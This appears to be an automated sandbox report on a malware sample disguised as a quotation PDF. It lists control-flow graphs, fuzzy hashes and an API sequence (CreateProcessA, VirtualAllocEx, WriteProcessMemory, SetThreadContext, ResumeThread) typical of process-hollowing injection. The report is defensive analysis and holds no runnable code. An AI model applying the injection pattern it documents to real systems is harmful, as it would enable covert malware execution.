                                                    control_flow_graph 1539 5c00c20-5c00c43 1541 5c00c52-5c00c5b 1539->1541 1542 5c00c45-5c00c50 1539->1542 1542->1541 1543 5c00c5e-5c00c80 1542->1543 1671 5c00c83 call 5c01398 1543->1671 1672 5c00c83 call 5c013a8 1543->1672 1545 5c00c89-5c00c92 1546 5c00ce3-5c00d0a 1545->1546 1547 5c00c94-5c00cac 1545->1547 1551 5c00d10 1546->1551 1552 5c00f0f-5c00f21 call 5c00760 1546->1552 1547->1546 1550 5c00cae-5c00cd9 1547->1550 1550->1546 1559 5c00cdb-5c00ce0 1550->1559 1556 5c00d19-5c00d21 1551->1556 1557 5c00f40-5c00f46 1552->1557 1558 5c00f23-5c00f3b 1552->1558 1560 5c00d23 1556->1560 1561 5c00d2a-5c00d2d 1556->1561 1562 5c00f55-5c00f9f call 5c01c28 1557->1562 1563 5c00f48-5c00f4f 1557->1563 1558->1557 1586 5c00f3d 1558->1586 1559->1546 1560->1561 1564 5c00d41-5c00d53 1560->1564 1565 5c00e61-5c00e75 1560->1565 1566 5c00dc8-5c00dda 1560->1566 1567 5c00e29-5c00e45 1560->1567 1568 5c00e4a-5c00e5c 1560->1568 1569 5c00db0-5c00dc3 1560->1569 1570 5c00e11-5c00e24 1560->1570 1571 5c00e92-5c00eae 1560->1571 1572 5c00df8-5c00e0c 1560->1572 1573 5c00d98-5c00dab 1560->1573 1574 5c00d58-5c00d93 1560->1574 1575 5c00e7a-5c00e8d 1560->1575 1576 5c00ddf-5c00df3 1560->1576 1577 5c00eb0-5c00ee1 1561->1577 1578 5c00d33-5c00d36 1561->1578 1603 5c00fa5 1562->1603 1563->1562 1580 5c00f51-5c00f53 1563->1580 1564->1552 1565->1552 1566->1552 1567->1552 1568->1552 1569->1552 1570->1552 1571->1552 1572->1552 1573->1552 1574->1552 1575->1552 1576->1552 1577->1552 1581 5c00ee3-5c00f0d 1578->1581 1582 5c00d3c 1578->1582 1588 5c00fa7-5c00fa9 1580->1588 1581->1552 1582->1552 1586->1557 1601 5c012cd-5c012d6 1588->1601 1602 5c00faf-5c00fb8 1588->1602 1604 5c00fca-5c0100a 1602->1604 1605 5c00fba-5c00fc2 1602->1605 1603->1588 1613 5c0100c-5c0101c 1604->1613 1614 5c0101e 1604->1614 1605->1604 1613->1614 1615 5c01020-5c01022 1613->1615 1614->1615 1617 5c01041-5c01070 1615->1617 1618 5c01024-5c0103f 1615->1618 1623 5c010ad-5c010b5 1617->1623 1627 5c01072-5c0109e 1617->1627 1618->1623 1625 5c010c3 1623->1625 1626 5c010b7-5c010c1 1623->1626 1628 5c010c8-5c010ca 1625->1628 1626->1628 1627->1623 1637 5c010a0-5c010a4 1627->1637 1629 5c010da-5c0114c 1628->1629 1630 5c010cc-5c010d2 1628->1630 1638 5c01170-5c01196 1629->1638 1639 5c0114e-5c01165 1629->1639 1630->1629 1637->1623 1641 5c01198-5c011a3 1638->1641 1642 5c011ad 1638->1642 1639->1638 1673 5c011a5 call 5c02108 1641->1673 1674 5c011a5 call 5c020aa 1641->1674 1643 5c011af-5c011ce 1642->1643 1643->1601 1646 5c011d4-5c011e6 call 5c00760 1643->1646 1644 5c011ab 1644->1643 1646->1601 1649 5c011ec-5c01204 1646->1649 1651 5c01206-5c0120f 1649->1651 1652 5c0123d-5c01255 1649->1652 1653 5c01211-5c01214 1651->1653 1654 5c0121e-5c01225 1651->1654 1657 5c01285-5c0129d 1652->1657 1658 5c01257-5c01260 1652->1658 1653->1654 1654->1652 1656 5c01227-5c01238 1654->1656 1656->1601 1657->1601 1664 5c0129f-5c012a8 1657->1664 1659 5c01262-5c01265 1658->1659 1660 5c0126f-5c01278 1658->1660 1659->1660 1660->1657 1662 5c0127a-5c01282 1660->1662 1662->1657 1666 5c012b7-5c012c0 1664->1666 1667 5c012aa-5c012ad 1664->1667 1666->1601 1668 5c012c2-5c012ca 1666->1668 1667->1666 1668->1601 1671->1545 1672->1545 1673->1644 1674->1644
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (_0q
                                                    • API String ID: 0-3680912921
                                                    • Opcode ID: e085d2a49d0783f2df8b7574334163caf2c7c019143c6b315452fca8d3431b48
                                                    • Instruction ID: dc7678bd2eee307eab61c30d491ab79aebb17cff4f7527b65fb3b769bb33a7dc
                                                    • Opcode Fuzzy Hash: e085d2a49d0783f2df8b7574334163caf2c7c019143c6b315452fca8d3431b48
                                                    • Instruction Fuzzy Hash: 8A226B35A102059FDB14DFA9C894A6DBBF6FF88300F158469E906EB3A5CB71ED44CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1675 5c80d87-5c80e25 1677 5c80e5e-5c80e7e 1675->1677 1678 5c80e27-5c80e31 1675->1678 1683 5c80e80-5c80e8a 1677->1683 1684 5c80eb7-5c80ee6 1677->1684 1678->1677 1679 5c80e33-5c80e35 1678->1679 1681 5c80e58-5c80e5b 1679->1681 1682 5c80e37-5c80e41 1679->1682 1681->1677 1685 5c80e43 1682->1685 1686 5c80e45-5c80e54 1682->1686 1683->1684 1688 5c80e8c-5c80e8e 1683->1688 1694 5c80ee8-5c80ef2 1684->1694 1695 5c80f1f-5c80fd9 CreateProcessA 1684->1695 1685->1686 1686->1686 1687 5c80e56 1686->1687 1687->1681 1689 5c80e90-5c80e9a 1688->1689 1690 5c80eb1-5c80eb4 1688->1690 1692 5c80e9c 1689->1692 1693 5c80e9e-5c80ead 1689->1693 1690->1684 1692->1693 1693->1693 1697 5c80eaf 1693->1697 1694->1695 1696 5c80ef4-5c80ef6 1694->1696 1706 5c80fdb-5c80fe1 1695->1706 1707 5c80fe2-5c81068 1695->1707 1698 5c80ef8-5c80f02 1696->1698 1699 5c80f19-5c80f1c 1696->1699 1697->1690 1701 5c80f04 1698->1701 1702 5c80f06-5c80f15 1698->1702 1699->1695 1701->1702 1702->1702 1703 5c80f17 1702->1703 1703->1699 1706->1707 1717 5c81078-5c8107c 1707->1717 1718 5c8106a-5c8106e 1707->1718 1720 5c8108c-5c81090 1717->1720 1721 5c8107e-5c81082 1717->1721 1718->1717 1719 5c81070 1718->1719 1719->1717 1723 5c810a0-5c810a4 1720->1723 1724 5c81092-5c81096 1720->1724 1721->1720 1722 5c81084 1721->1722 1722->1720 1726 5c810b6-5c810bd 1723->1726 1727 5c810a6-5c810ac 1723->1727 1724->1723 1725 5c81098 1724->1725 1725->1723 1728 5c810bf-5c810ce 1726->1728 1729 5c810d4 1726->1729 1727->1726 1728->1729 1731 5c810d5 1729->1731 1731->1731
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C80FC6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: 5d9ad49b3847cc484421a570850a8b6e167c512f77cdbf585769a12d8799464a
                                                    • Instruction ID: 8d41a7bedbc2fa28f756d43b0e0c0dc0c165c4077ac629f3c694438ee70c2bcc
                                                    • Opcode Fuzzy Hash: 5d9ad49b3847cc484421a570850a8b6e167c512f77cdbf585769a12d8799464a
                                                    • Instruction Fuzzy Hash: 0A919B71D002599FDB20DF68C944BEEBBF2BF48314F148969D848B7280D7749A89CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05C80FC6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: e4026f323645303e461a67362b8e847136b527d5ec1ae45e02e2bbc48c646320
                                                    • Instruction ID: 8e50466f232a38cf212c4430fd8ae5c0df4d196d70464125cccc5f534e7ea859
                                                    • Opcode Fuzzy Hash: e4026f323645303e461a67362b8e847136b527d5ec1ae45e02e2bbc48c646320
                                                    • Instruction Fuzzy Hash: B7918B71D042599FDB20DF68C944BEEBBF2BF48314F148969D848B7280DB749A89CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05C80C78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 7f685de311c8f42f5f61a8ce155d49b861b7dc1dd2075874721d70427fdee4a6
                                                    • Instruction ID: b99760d0cb3276fac9cc2b3df07ad479a6da68642a45147fed3091eade72effa
                                                    • Opcode Fuzzy Hash: 7f685de311c8f42f5f61a8ce155d49b861b7dc1dd2075874721d70427fdee4a6
                                                    • Instruction Fuzzy Hash: 73315C769002098FCB10DFA9C9857EEFBF5FF88324F14882AE514A7341C7799944CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05C80C78
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: f1329b2b108dd4087a7bc37a1cc832b96e67e110b95a5228e5c36ef6c57c651c
                                                    • Instruction ID: 9641fd9054378c55d93ba060a049a63af7aaa420f0ee7d8547d126c07d845171
                                                    • Opcode Fuzzy Hash: f1329b2b108dd4087a7bc37a1cc832b96e67e110b95a5228e5c36ef6c57c651c
                                                    • Instruction Fuzzy Hash: F32139B59003199FCF10DFAAC9847EEBBF5FF48324F108829E918A7250C7789944CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C81250
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 4c1ef1420a202e98897308a0e96ac6eae1d0a759c7afe94c516856e5271fb0ed
                                                    • Instruction ID: b70d24689dfd039561da7b6968fcaf5d7b1800da19e360ccf879b1f0cc41d3b8
                                                    • Opcode Fuzzy Hash: 4c1ef1420a202e98897308a0e96ac6eae1d0a759c7afe94c516856e5271fb0ed
                                                    • Instruction Fuzzy Hash: 67213CB1D002499FCB10DFAAC9847EEFBF5FF48320F548829E518A7240C7789945CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 05C80ACE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: 76fceb66d4a433278f18b906dbbc7e085a181c2c3c67c3605eb7b0ef4a9795e2
                                                    • Instruction ID: d5a3f359d23aaab2313081ff512233dd888ed95c34331d80c6de777a0fe3e887
                                                    • Opcode Fuzzy Hash: 76fceb66d4a433278f18b906dbbc7e085a181c2c3c67c3605eb7b0ef4a9795e2
                                                    • Instruction Fuzzy Hash: 30213871D002098FDB50DFAAC5857EEBBF4EF88364F54842AD419A7241C778A944CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05C81250
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 58c7eda0b5057c091672f7f86a29e217bf7b48d2c751e7f94fcdafa71a0c1ae9
                                                    • Instruction ID: 3dbb991b601c849b433561794e13a6c0bd197a4e985cf65dd1fef03f3a60b0a6
                                                    • Opcode Fuzzy Hash: 58c7eda0b5057c091672f7f86a29e217bf7b48d2c751e7f94fcdafa71a0c1ae9
                                                    • Instruction Fuzzy Hash: 7B2139B1C002499FCB10DFAAC9847EEFBF5FF48320F548829E518A7240C7789944CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 05C80ACE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: ContextThread
                                                    • String ID:
                                                    • API String ID: 1591575202-0
                                                    • Opcode ID: 124f6ecdc44a5d1e5732ac5325995718d55a2d28aa7a6ac733d6c9fa1bdcda36
                                                    • Instruction ID: 8281089810351dbddc0f219ee93de6be2f5f9bcce6e1e4dd8ebfe516b3a8720f
                                                    • Opcode Fuzzy Hash: 124f6ecdc44a5d1e5732ac5325995718d55a2d28aa7a6ac733d6c9fa1bdcda36
                                                    • Instruction Fuzzy Hash: 1F214971D002098FDB10DFAAC5847EEBBF4EF88324F14842AD419A7241C778A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C80B96
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 18d6c93ea309507f8001c477a2a1aa50ce1893fb158a39606f85d3c456b1718c
                                                    • Instruction ID: 168f43deda8271512f4f302ea09d993cd191ea6643effaccde54716d0bfa6eb4
                                                    • Opcode Fuzzy Hash: 18d6c93ea309507f8001c477a2a1aa50ce1893fb158a39606f85d3c456b1718c
                                                    • Instruction Fuzzy Hash: B21137769002099FCF10DFAAC945BEEBFF5EF88324F248829E515A7250C775A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05C80B96
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 78fde221f83fe212a75a09ad9d7b904e10fa3629886d4e87450646ed0ada4fbf
                                                    • Instruction ID: f07736795c17ffa78b603364a5f471294ce058f21c4df6c7f7d86edf96558386
                                                    • Opcode Fuzzy Hash: 78fde221f83fe212a75a09ad9d7b904e10fa3629886d4e87450646ed0ada4fbf
                                                    • Instruction Fuzzy Hash: 8B1137759002099FCB10DFAAC944BEEBFF5AF88324F248819E515A7250C775A944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 4139c62a144dfc80d1b73503e4aa942f4a1d0e39aa99da66f00f24c557cf1666
                                                    • Instruction ID: cc23a32767c74125d6f6707ec541719f13f1a06e7ae73457ae377ca18c9ede22
                                                    • Opcode Fuzzy Hash: 4139c62a144dfc80d1b73503e4aa942f4a1d0e39aa99da66f00f24c557cf1666
                                                    • Instruction Fuzzy Hash: D8113DB5D002488FCB10DFA9C6457EEFBF5AF48324F248819C515B7241C7795944CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    • Opcode ID: 6874340abe9e2057b63bf99ffc6c69e65aa4a7926092b8e2e8816301632974ad
                                                    • Instruction ID: 374dcb6cc1c0ead16db32773040cc0e99dc248d637ca218486a611846c0f18a3
                                                    • Opcode Fuzzy Hash: 6874340abe9e2057b63bf99ffc6c69e65aa4a7926092b8e2e8816301632974ad
                                                    • Instruction Fuzzy Hash: E8111CB5D002498FDB20DFAAC5487EEFBF9AF88324F248819D515A7340C779A944CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (4q
                                                    • API String ID: 0-3825661732
                                                    • Opcode ID: 6b4b3c4cb5cd03c80874407a542e448b8e9328495c5614cd6758eea65a971b25
                                                    • Instruction ID: 5f39a5afe2017092c41084eb342ec40b7ff6fe600028a1cc07d926ce00181cf0
                                                    • Opcode Fuzzy Hash: 6b4b3c4cb5cd03c80874407a542e448b8e9328495c5614cd6758eea65a971b25
                                                    • Instruction Fuzzy Hash: 75B1CB35A047058FCB25DFA9C844A6EBBF2BF88300F14896AE546D7B94DB30E905CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,4q
                                                    • API String ID: 0-2140648754
                                                    • Opcode ID: 8d13f4bad7297000dcb36c5a18540060a6908e04de4e8ec4a8e8d015bc71560d
                                                    • Instruction ID: 37948d0b70fc195fe260884b3b0df3e30fe0ab9ddd3e43b0bb134553ff9b08db
                                                    • Opcode Fuzzy Hash: 8d13f4bad7297000dcb36c5a18540060a6908e04de4e8ec4a8e8d015bc71560d
                                                    • Instruction Fuzzy Hash: 0CC15D74B001299FDB19CF59C945BDDBBF6BF88700F1484A9E509AB395CA309E81CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (4q
                                                    • API String ID: 0-3825661732
                                                    • Opcode ID: 2e2ac4a3dfbcefe760d326c0ac1bf83558c2661a1be6aba3c60190beed8fd484
                                                    • Instruction ID: 66609f6a18b82c1a7e2ea01ae4405ba20a5478cd3d8115997ac4268f6fb06e65
                                                    • Opcode Fuzzy Hash: 2e2ac4a3dfbcefe760d326c0ac1bf83558c2661a1be6aba3c60190beed8fd484
                                                    • Instruction Fuzzy Hash: A9910434A007068FCB12DF68C4949AEBBF6FF85300B54486AC541DB3A5EB30EE06CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'0q
                                                    • API String ID: 0-2605422550
                                                    • Opcode ID: b8c1705789c00839bdb52b2eca5f066c76e8ee5f7d199785a229fa02f17088d3
                                                    • Instruction ID: eb602ac49137e34962683506caada1b9d60a26a5fb8ac6eb063ffb254f987a39
                                                    • Opcode Fuzzy Hash: b8c1705789c00839bdb52b2eca5f066c76e8ee5f7d199785a229fa02f17088d3
                                                    • Instruction Fuzzy Hash: E7A1F934A10218DFCB08EFA4D89899DBBB2FF89300F559559E406AB3A5DF34AC42CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'0q
                                                    • API String ID: 0-2605422550
                                                    • Opcode ID: 4f8a418be57a1f54b5c4bfe7671d035e1e424c467db0e0a1c026e941fc49a3d8
                                                    • Instruction ID: 53292894135c4d50dd0ffb9bdc4803ff0eb11da5edfb5022c9c209d9f6a64e83
                                                    • Opcode Fuzzy Hash: 4f8a418be57a1f54b5c4bfe7671d035e1e424c467db0e0a1c026e941fc49a3d8
                                                    • Instruction Fuzzy Hash: EC713C30B002149FDB19EB68C954BAEBBB7BF88710F109469E506AB3D4CF759D42CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XR5q
                                                    • API String ID: 0-3321266579
                                                    • Opcode ID: bc70533b537f491044c6eda673f0746669997aea614e44b3be0b55efc7a7d1e4
                                                    • Instruction ID: 53e64eaa6d01eefc5d19869026763749d27f0484b155df498f40259b59a9163a
                                                    • Opcode Fuzzy Hash: bc70533b537f491044c6eda673f0746669997aea614e44b3be0b55efc7a7d1e4
                                                    • Instruction Fuzzy Hash: AF6155757042208FCB18CB28C998E6A3BF2FF8A315B1595A9E506CB3B5DB31DD42CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'0q
                                                    • API String ID: 0-2605422550
                                                    • Opcode ID: d179e2916369cfe63016c9ffe09d44d9b483416efae6ddccd94f71e815b5ae65
                                                    • Instruction ID: bb04e0e9818009b9a924b30377201d6c64c5ba164f9fdb6ad8fe2b5202bbbe7f
                                                    • Opcode Fuzzy Hash: d179e2916369cfe63016c9ffe09d44d9b483416efae6ddccd94f71e815b5ae65
                                                    • Instruction Fuzzy Hash: 99416F34B106148FCB18FB64C498A6EB7F7AFC9700F505919E502AB3E5CF74AC469B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'0q
                                                    • API String ID: 0-2605422550
                                                    • Opcode ID: 32be4cc54ec65ed5ceed00255e5a5229790ee97e1533aff55ac492fe4f6f300c
                                                    • Instruction ID: 18e3105f220db62d9699b788e77ffea13378887f391e067f5649e552dc96a53e
                                                    • Opcode Fuzzy Hash: 32be4cc54ec65ed5ceed00255e5a5229790ee97e1533aff55ac492fe4f6f300c
                                                    • Instruction Fuzzy Hash: 53315E753006109FD709EB68C999F2A77AAAFC9714F108568E2068F3E5CE71ED02C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'0q
                                                    • API String ID: 0-2605422550
                                                    • Opcode ID: f3df4a71a9d36cf0618f8f516d6533a7a2bc722af2ebd8bc42611ed7e500441e
                                                    • Instruction ID: 3c3fd08663b62aaebe9bffa48e407d95dfb72aca3e116e0ab881b55670d3cff3
                                                    • Opcode Fuzzy Hash: f3df4a71a9d36cf0618f8f516d6533a7a2bc722af2ebd8bc42611ed7e500441e
                                                    • Instruction Fuzzy Hash: BC3130753006119FD709DB69C999F2B77AAEFC9714F108568E2068B3A1CE71ED02C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'0q
                                                    • API String ID: 0-2605422550
                                                    • Opcode ID: 2709047edc89c01d050ae670278b895dba6846b5f0b998ea7d1d8cbc25de6d6e
                                                    • Instruction ID: 53c29f96c9ea4fb67b60cd4f38c08543d98a943a8416ff9b220ee7dfec1a3a9d
                                                    • Opcode Fuzzy Hash: 2709047edc89c01d050ae670278b895dba6846b5f0b998ea7d1d8cbc25de6d6e
                                                    • Instruction Fuzzy Hash: DF41C574A00214CFDB18DF64D998AAEBBB2FF89704F114558E502AB3A5CB75ED42CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'0q
                                                    • API String ID: 0-2605422550
